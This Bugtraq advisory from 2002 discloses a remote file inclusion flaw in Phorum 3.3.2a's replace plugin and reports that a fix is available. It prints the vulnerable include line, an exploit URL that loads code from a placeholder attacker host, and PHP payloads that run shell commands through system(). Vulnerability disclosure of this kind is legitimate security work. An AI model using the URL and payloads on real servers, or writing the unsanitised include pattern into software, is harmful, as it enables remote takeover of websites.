Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Phorum 3.3.2a remote command execution

From: Markus Arndt <markus-arndt () web de>
Date: Fri, 17 May 2002 20:26:40 +0200
Target:
Phorum 3.3.2a (prior versions?)

Description:
In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
include external php scripts and execute arbitary code.

Found by:
Markus Arndt<markus-arndt () web de>

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed version available

Details:

After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
I just snooped around a bit and found this file vulnerable for remote script inclusion:

./plugin/replace/plugin.php

let's see some code:



        <?php
        include("$PHORUM[settings_dir]/replace.php");

        function mod_replace_read_body ($body) {
          global $pluginreplace;
          reset($pluginreplace);
          while(list($key,$val) = each($pluginreplace)) {
            $body = str_replace($key,$val,$body);
          }
          return $body;
        }

        $plugins["read_body"]["mod_replace"]="mod_replace_read_body";

        ?>


Easy one..

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

This one will get the file http://[evilhost]/replace.php and execute it.
If [evilhost] has php enabled we could use this one as replace.php:

        <?
        echo("<?
        system(\"\$cmd\");
        ?>");
        ?>

If it's not php-enabled simply:
        <?
        system("$cmd");
        ?>




Markus Arndt<markus-arndt () web de>
http://skka.de
________________________________________________________________
Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! 
Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
Previous By Date Next
Previous By Thread Next

Current thread: